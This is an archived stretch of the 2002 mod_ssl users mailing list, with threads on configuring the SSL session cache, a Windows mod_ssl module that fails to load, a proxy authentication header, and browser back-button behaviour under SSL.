In-Reply-To: <5.1.0.14.0.20020515132839.00ad7098@mail.ebondtrade.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, 15 May 2002, Ted Bannon wrote:

> I've been trying to make use of the SSLSessionCache shared memory option in
> my Apache config:
>
> #SSLSessionCache        shmht:/data/home/apache/1.3.24/logs/ssl_scache(512000)
> #SSLSessionCache        shmcb:/data/home/apache/1.3.24/logs/ssl_scache(512000)
> SSLSessionCache         dbm:/data/home/apache/1.3.24/logs/ssl_scache
> #SSLSessionCache
> shm:/data/home/apache/1.3.24/logs/ssl_gcache_data(512000)

Note that shm: is equivalent to shmht: ... there are really only two
types of shm session caches.

> SSLSessionCache: shared memory cache not useable on this platform

You need to define EAPI_MM when building Apache.  See the INSTALL file for
mod_ssl, somewhere around line 281.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 16 13:17:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA06176; Thu, 16 May 2002 13:16:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from s05128.postbox.be id NAA06160; Thu, 16 May 2002 13:16:01 +0200 (MET DST)
Received: from [194.78.226.46] by postbox.be with ESMTP for modssl-users@modssl.org; Thu, 16 May 2002 13:15:43 +0200
Message-Id: <004901c1fccb$05e85f40$24aeb381@fuy001>
From: "Frederik Uyttersprot" 
To: 
References: <200205150028.CAA10991@opensource.ee.ethz.ch>
Subject: Re: [BugDB] mod_ssl.so does not load (again, sorry) (PR#704)
Date: Thu, 16 May 2002 13:15:11 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Frederik Uyttersprot" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello Dimitri,

Did you give Apache 2.0.36 binaries a try?
It should have mod_ssl compiled into to by default as far as I know.

I managed to get all the ssl stuff and more working on Solaris, so that
won't be of any good for you....

Greets,
Frederik.

ps. small world euh :-)

----- Original Message -----
From: 
To: 
Cc: 
Sent: Wednesday, May 15, 2002 2:28 AM
Subject: [BugDB] mod_ssl.so does not load (again, sorry) (PR#704)


> Full_Name: Dimitri Pochet
> Version: Apache_1.3.24-Mod_SSL_2.8.8-OpenSSL_0.9.6c-WIN32.zip
> OS: NT4 SP6a
> Submission from: (NULL) (217.136.205.41)
>
>
> Steps to reproduce: Installation of Apache, keys generation and
installation of
> modSSL, according to http://tud.at/programm/apache-ssl-win32-howto.php3
> libeay.dll and ssleay.dll copied in winnt/system32. Earlier such files
(from
> teraterm ttssh) removed.
> openssl.exe in the path (and runnable from any working dir).
> httpd.conf was edited according to the install page above, including
AddModule
> and LoadModule.
>
> Symptom :
> Syntax error on line 173 of C:/Program Files/Apache
> Group/Apache2/conf/httpd.conf:
> Cannot load C:/Program Files/Apache Group/Apache2/modules/mod_ssl.so into
> server: The specified module could not be found.
>
> log levels set to debug.
>
> Error logs:
> Nothing in event DB
> Nothing in error.log (except half a timestamp)
> Nothing in access.log except my successful attempts on port 80
> No ssl.log has been created
>
> Tried to use a strace on apache.exe, no success.
> Then, tried using earlier versions of apache+modssl, same error.
> Unfortunately I do not know C, otherwise I would have tried adding debug
info
> from the .so.
> Given up, tima beg for help.
>
> Question:
> appart solving this problem which looks uneasy when I see the unanswered
rfh on
> the web, is there a way to activate some debug on loading of dso modules ?
> what about the new apache versions ? any intention to follow them up ?
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 16 13:27:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA06748; Thu, 16 May 2002 13:26:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from s05128.postbox.be id NAA06741; Thu, 16 May 2002 13:25:57 +0200 (MET DST)
Received: from [194.78.226.46] by postbox.be with ESMTP for modssl-users@modssl.org; Thu, 16 May 2002 13:25:45 +0200
Message-Id: <000b01c1fccc$6bd45510$24aeb381@fuy001>
From: "Frederik Uyttersprot" 
To: 
References: <200205150028.CAA10991@opensource.ee.ethz.ch> <004901c1fccb$05e85f40$24aeb381@fuy001>
Subject: Re: [BugDB] mod_ssl.so does not load (again, sorry) (PR#704)
Date: Thu, 16 May 2002 13:25:42 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Frederik Uyttersprot" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Oeps,

Let me correct myself... only no-ssl binaries on httpd.apache.org for now.
Guess someone should compile it for you then (if possible at all).

Sorry,
-FU

----- Original Message -----
From: "Uyttersprot Frederik" 
To: 
Sent: Thursday, May 16, 2002 1:15 PM
Subject: Re: [BugDB] mod_ssl.so does not load (again, sorry) (PR#704)


> Hello Dimitri,
>
> Did you give Apache 2.0.36 binaries a try?
> It should have mod_ssl compiled into to by default as far as I know.
>
> I managed to get all the ssl stuff and more working on Solaris, so that
> won't be of any good for you....
>
> Greets,
> Frederik.
>
> ps. small world euh :-)
>
> ----- Original Message -----
> From: 
> To: 
> Cc: 
> Sent: Wednesday, May 15, 2002 2:28 AM
> Subject: [BugDB] mod_ssl.so does not load (again, sorry) (PR#704)
>
>
> > Full_Name: Dimitri Pochet
> > Version: Apache_1.3.24-Mod_SSL_2.8.8-OpenSSL_0.9.6c-WIN32.zip
> > OS: NT4 SP6a
> > Submission from: (NULL) (217.136.205.41)
> >
> >
> > Steps to reproduce: Installation of Apache, keys generation and
> installation of
> > modSSL, according to http://tud.at/programm/apache-ssl-win32-howto.php3
> > libeay.dll and ssleay.dll copied in winnt/system32. Earlier such files
> (from
> > teraterm ttssh) removed.
> > openssl.exe in the path (and runnable from any working dir).
> > httpd.conf was edited according to the install page above, including
> AddModule
> > and LoadModule.
> >
> > Symptom :
> > Syntax error on line 173 of C:/Program Files/Apache
> > Group/Apache2/conf/httpd.conf:
> > Cannot load C:/Program Files/Apache Group/Apache2/modules/mod_ssl.so
into
> > server: The specified module could not be found.
> >
> > log levels set to debug.
> >
> > Error logs:
> > Nothing in event DB
> > Nothing in error.log (except half a timestamp)
> > Nothing in access.log except my successful attempts on port 80
> > No ssl.log has been created
> >
> > Tried to use a strace on apache.exe, no success.
> > Then, tried using earlier versions of apache+modssl, same error.
> > Unfortunately I do not know C, otherwise I would have tried adding debug
> info
> > from the .so.
> > Given up, tima beg for help.
> >
> > Question:
> > appart solving this problem which looks uneasy when I see the unanswered
> rfh on
> > the web, is there a way to activate some debug on loading of dso modules
?
> > what about the new apache versions ? any intention to follow them up ?
> >
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 16 13:33:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA07158; Thu, 16 May 2002 13:32:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id NAA07111; Thu, 16 May 2002 13:31:15 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g4GBUnv29272
	for ; Thu, 16 May 2002 11:30:54 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Thu, 16 May 2002 12:30:46 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F02067082@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: [BugDB] mod_ssl.so does not load (again, sorry) (PR#704)
Date: Thu, 16 May 2002 12:30:45 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I believe you need openssl installed as you do with the apache 1.3 mod_ssl
combination. At the very least you need /lib/libcrypto.so.0 and
/lib/libssl.so.0. 

John


> -----Original Message-----
> From: Frederik Uyttersprot [mailto:Frederik.Uyttersprot@postbox.be]
> Sent: 16 May 2002 12:26
> To: modssl-users@modssl.org
> Subject: Re: [BugDB] mod_ssl.so does not load (again, sorry) (PR#704)
> 
> 
> Oeps,
> 
> Let me correct myself... only no-ssl binaries on 
> httpd.apache.org for now.
> Guess someone should compile it for you then (if possible at all).
> 
> Sorry,
> -FU
> 
> ----- Original Message -----
> From: "Uyttersprot Frederik" 
> To: 
> Sent: Thursday, May 16, 2002 1:15 PM
> Subject: Re: [BugDB] mod_ssl.so does not load (again, sorry) (PR#704)
> 
> 
> > Hello Dimitri,
> >
> > Did you give Apache 2.0.36 binaries a try?
> > It should have mod_ssl compiled into to by default as far as I know.
> >
> > I managed to get all the ssl stuff and more working on 
> Solaris, so that
> > won't be of any good for you....
> >
> > Greets,
> > Frederik.
> >
> > ps. small world euh :-)
> >
> > ----- Original Message -----
> > From: 
> > To: 
> > Cc: 
> > Sent: Wednesday, May 15, 2002 2:28 AM
> > Subject: [BugDB] mod_ssl.so does not load (again, sorry) (PR#704)
> >
> >
> > > Full_Name: Dimitri Pochet
> > > Version: Apache_1.3.24-Mod_SSL_2.8.8-OpenSSL_0.9.6c-WIN32.zip
> > > OS: NT4 SP6a
> > > Submission from: (NULL) (217.136.205.41)
> > >
> > >
> > > Steps to reproduce: Installation of Apache, keys generation and
> > installation of
> > > modSSL, according to 
> http://tud.at/programm/apache-ssl-win32-howto.php3
> > > libeay.dll and ssleay.dll copied in winnt/system32. 
> Earlier such files
> > (from
> > > teraterm ttssh) removed.
> > > openssl.exe in the path (and runnable from any working dir).
> > > httpd.conf was edited according to the install page 
> above, including
> > AddModule
> > > and LoadModule.
> > >
> > > Symptom :
> > > Syntax error on line 173 of C:/Program Files/Apache
> > > Group/Apache2/conf/httpd.conf:
> > > Cannot load C:/Program Files/Apache 
> Group/Apache2/modules/mod_ssl.so
> into
> > > server: The specified module could not be found.
> > >
> > > log levels set to debug.
> > >
> > > Error logs:
> > > Nothing in event DB
> > > Nothing in error.log (except half a timestamp)
> > > Nothing in access.log except my successful attempts on port 80
> > > No ssl.log has been created
> > >
> > > Tried to use a strace on apache.exe, no success.
> > > Then, tried using earlier versions of apache+modssl, same error.
> > > Unfortunately I do not know C, otherwise I would have 
> tried adding debug
> > info
> > > from the .so.
> > > Given up, tima beg for help.
> > >
> > > Question:
> > > appart solving this problem which looks uneasy when I see 
> the unanswered
> > rfh on
> > > the web, is there a way to activate some debug on loading 
> of dso modules
> ?
> > > what about the new apache versions ? any intention to 
> follow them up ?
> > >
> > >
> > > 
> ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                   
> www.modssl.org
> > > User Support Mailing List                      
> modssl-users@modssl.org
> > > Automated List Manager                            
> majordomo@modssl.org
> > >
> >
> > 
> ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   
> www.modssl.org
> > User Support Mailing List                      
> modssl-users@modssl.org
> > Automated List Manager                            
> majordomo@modssl.org
> >
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 

14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to
find out all about it.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 16 13:34:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA07227; Thu, 16 May 2002 13:33:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id NAA07215; Thu, 16 May 2002 13:33:01 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g4GBWfv29378
	for ; Thu, 16 May 2002 11:32:46 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Thu, 16 May 2002 12:32:38 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F02067083@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: Proxying problem - a little off topic
Date: Thu, 16 May 2002 12:32:38 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Answering my own post, the line
"RequestHeader unset Authorisation" 

in Apache 2.0.36 config fixes this issue. I've also been sent a dirty hack
of mod_proxy from someone else to do the same.

Perhaps putting the line "a little off topic" in my post stopped everyone
reading it!

John

> -----Original Message-----
> From: John.Airey@rnib.org.uk [mailto:John.Airey@rnib.org.uk]
> Sent: 15 May 2002 10:00
> To: modssl-users@modssl.org
> Subject: Proxying problem - a little off topic
> 
> 
> I currently use basic auth over SSL to connect to our Intranet site
> (https://iris.rnib.org.uk). This has worked fine for many 
> years,  however,
> we need to move to a new system that runs on IIS (stellent, formerly
> xpedio), although some content will remain on Apache. 
> 
>[snip]

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 

14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to
find out all about it.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 16 16:16:27 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA19108; Thu, 16 May 2002 16:15:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sch1p312.cna.com id QAA19085; Thu, 16 May 2002 16:15:00 +0200 (MET DST)
Received: from wch1xi04.cna.com (wch1xi04.cna.com [10.20.21.170])
	by sch1p312.cna.com (Switch-2.1.0/Switch-2.1.0) with SMTP id g4GE8aM28604
	for ; Thu, 16 May 2002 09:08:37 -0500 (CDT)
Received: from 10.20.23.108 by wch1xi04.cna.com (InterScan E-Mail VirusWall NT); Thu, 16 May 2002 09:14:00 -0500
Received: by wch1xi02.cna.com with Internet Mail Service (5.5.2653.19)
	id ; Thu, 16 May 2002 09:13:59 -0500
Message-ID: 
From: "Boex,Matthew W." 
To: modssl-users@modssl.org
Subject: back button with SSL
Date: Thu, 16 May 2002 09:13:56 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boex,Matthew W." 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

i am having a problem with my cgi.  when a user puts in bad data and i
generate an error page, i tell them to click "back" on their browser.  while
under ssl, if a user clicks back, it takes them to the beginning of the
script, not where they left off.  i am using hidden tags to keep state...

matt

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 16 16:22:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA19606; Thu, 16 May 2002 16:21:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from opie.usu.edu id QAA19536; Thu, 16 May 2002 16:20:24 +0200 (MET DST)
Received: from RM426 ("port 4380"@rm426.cs.usu.edu [129.123.109.181])
 by cc.usu.edu (PMDF V5.2-32 #39089)
 with SMTP id <01KHSEQ6HCX8926677@cc.usu.edu> for modssl-users@modssl.org; Thu,
 16 May 2002 08:20:06 MDT
Date: Thu, 16 May 2002 08:17:08 -0600
From: Alex Earl 
Subject: Re: back button with SSL
To: modssl-users@modssl.org
Message-id: <001701c1fce4$5cec2f10$b56d7b81@RM426>
MIME-version: 1.0
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
Content-type: text/plain;	charset="iso-8859-1"
Content-transfer-encoding: 7bit
X-Priority: 3
X-MSMail-priority: Normal
References: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex Earl 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Why not have a back link on your page? It is usually bad to make the user
press the back button to navigate on your page. Or you could just parse the
errors and if there are errors...redisplay the form page that they entered
the wrong values on with the errors displayed.

Alex Earl


----- Original Message -----
From: "Boex,Matthew W." 
To: 
Sent: Thursday, May 16, 2002 8:13 AM
Subject: back button with SSL


> i am having a problem with my cgi.  when a user puts in bad data and i
> generate an error page, i tell them to click "back" on their browser.
while
> under ssl, if a user clicks back, it takes them to the beginning of the
> script, not where they left off.  i am using hidden tags to keep state...
>
> matt
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 16 16:30:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA20107; Thu, 16 May 2002 16:29:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id QAA20097; Thu, 16 May 2002 16:28:54 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Thu, 16 May 2002 07:27:48 -0700
Received: from 134.32.101.94 by lw7fd.law7.hotmail.msn.com with HTTP;
	Thu, 16 May 2002 14:27:48 GMT
X-Originating-IP: [134.32.101.94]
From: "paul priestman" 
To: modssl-users@modssl.org
Subject: Re: back button with SSL
Date: Thu, 16 May 2002 14:27:48 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 16 May 2002 14:27:48.0508 (UTC) FILETIME=[DA688DC0:01C1FCE5]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "paul priestman" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is probably because under SSL no caching of pages is allowed.  You 
could store the varibales and if errors occur pass the variables back to the 
script and re-populate the fields with these values - or you could do error 
checking on the client side using javascript.....




>From: "Boex,Matthew W." 
>Reply-To: modssl-users@modssl.org
>To: modssl-users@modssl.org
>Subject: back button with SSL
>Date: Thu, 16 May 2002 09:13:56 -0500
>
>i am having a problem with my cgi.  when a user puts in bad data and i
>generate an error page, i tell them to click "back" on their browser.  
>while
>under ssl, if a user clicks back, it takes them to the beginning of the
>script, not where they left off.  i am using hidden tags to keep state...
>
>matt
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org




_________________________________________________________________
Chat with friends online, try MSN Messenger: http://messenger.msn.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 16 16:37:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA20549; Thu, 16 May 2002 16:36:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sch1p312.cna.com id QAA20543; Thu, 16 May 2002 16:36:02 +0200 (MET DST)
Received: from wch1xi04.cna.com (wch1xi04.cna.com [10.20.21.170])
	by sch1p312.cna.com (Switch-2.1.0/Switch-2.1.0) with SMTP id g4GETnM09365
	for ; Thu, 16 May 2002 09:29:49 -0500 (CDT)
Received: from 10.20.23.108 by wch1xi04.cna.com (InterScan E-Mail VirusWall NT); Thu, 16 May 2002 09:35:12 -0500
Received: by wch1xi02.cna.com with Internet Mail Service (5.5.2653.19)
	id ; Thu, 16 May 2002 09:35:12 -0500
Message-ID: 
From: "Boex,Matthew W." 
To: "'modssl-users@modssl.org'" 
Subject: RE: back button with SSL
Date: Thu, 16 May 2002 09:35:07 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boex,Matthew W." 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

ah.  ok.  well, i will have to make some changes.... thanks.

matt

> -----Original Message-----
> From: paul priestman [mailto:primo1980@hotmail.com]
> Sent: Thursday, May 16, 2002 9:28 AM
> To: modssl-users@modssl.org
> Subject: Re: back button with SSL
> 
> 
> This is probably because under SSL no caching of pages is 
> allowed.  You 
> could store the varibales and if errors occur pass the 
> variables back to the 
> script and re-populate the fields with these values - or you 
> could do error 
> checking on the client side using javascript.....
> 
> 
> 
> 
> >From: "Boex,Matthew W." 
> >Reply-To: modssl-users@modssl.org
> >To: modssl-users@modssl.org
> >Subject: back button with SSL
> >Date: Thu, 16 May 2002 09:13:56 -0500
> >
> >i am having a problem with my cgi.  when a user puts in bad 
> data and i
> >generate an error page, i tell them to click "back" on their 
> browser.  
> >while
> >under ssl, if a user clicks back, it takes them to the 
> beginning of the
> >script, not where they left off.  i am using hidden tags to 
> keep state...
> >
> >matt
> >
> >_____________________________________________________________
> _________
> >Apache Interface to OpenSSL (mod_ssl)                   
> www.modssl.org
> >User Support Mailing List                      
> modssl-users@modssl.org
> >Automated List Manager                            
> majordomo@modssl.org
> 
> 
> 
> 
> _________________________________________________________________
> Chat with friends online, try MSN Messenger: http://messenger.msn.com
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 16 17:42:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA25708; Thu, 16 May 2002 17:41:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id RAA25587; Thu, 16 May 2002 17:40:17 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 308A24CE73C; Thu, 16 May 2002 17:40:16 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g4G7Ah642603; Thu, 16 May 2002 09:10:43 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hyperion.ebondtrade.com id XAA10588; Wed, 15 May 2002 23:59:48 +0200 (MET DST)
Received: from atm.ebondtrade.com ([192.168.30.1]) by
          hyperion.ebondtrade.com (Netscape Messaging Server 4.15) with
          ESMTP id GW6A2700.O09 for ; Wed, 15 May
          2002 14:51:43 -0700 
Message-Id: <5.1.0.14.0.20020515150302.03a5d2d0@mail.ebondtrade.com>
X-Sender: ted@mail.ebondtrade.com
X-Mailer: QUALCOMM Windows Eudora Version 5.1
X-Zantaz-Sequence: hyperion_11182001:230000
Date: Wed, 15 May 2002 15:04:06 -0700
To: modssl-users@modssl.org
From: "Ted Bannon" 
Subject: Re: SSLSessionCache: shared memory cache not useable on this 
  platform
In-Reply-To: 
References: <5.1.0.14.0.20020515132839.00ad7098@mail.ebondtrade.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ted Bannon" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanks, Cliff!  That seemed to work.

At 04:50 PM 5/15/2002 -0400, you wrote:
>On Wed, 15 May 2002, Ted Bannon wrote:
>
> > I've been trying to make use of the SSLSessionCache shared memory option in
> > my Apache config:
> >
> > 
> #SSLSessionCache        shmht:/data/home/apache/1.3.24/logs/ssl_scache(512000)
> > 
> #SSLSessionCache        shmcb:/data/home/apache/1.3.24/logs/ssl_scache(512000)
> > SSLSessionCache         dbm:/data/home/apache/1.3.24/logs/ssl_scache
> > #SSLSessionCache
> > shm:/data/home/apache/1.3.24/logs/ssl_gcache_data(512000)
>
>Note that shm: is equivalent to shmht: ... there are really only two
>types of shm session caches.
>
> > SSLSessionCache: shared memory cache not useable on this platform
>
>You need to define EAPI_MM when building Apache.  See the INSTALL file for
>mod_ssl, somewhere around line 281.
>
>--Cliff
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 16 17:42:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA25723; Thu, 16 May 2002 17:41:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id RAA25591; Thu, 16 May 2002 17:40:18 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 4E68F4CE73E; Thu, 16 May 2002 17:40:16 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g4G7B9O42609; Thu, 16 May 2002 09:11:09 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bsd1.center.iae.kyoto-u.ac.jp id HAA06917; Thu, 16 May 2002 07:00:15 +0200 (MET DST)
Received: from kondo12 ([133.3.19.172])
	by bsd1.center.iae.kyoto-u.ac.jp (8.11.3nb1/3.7W) with SMTP id g4G53MS29032
	for ; Thu, 16 May 2002 14:03:22 +0900 (JST)
Message-ID: <002b01c1fc97$6a251180$ac130385@kondo12>
From: "mineka fujimoto" 
To: 
Subject: make certificate TYPE=custom?
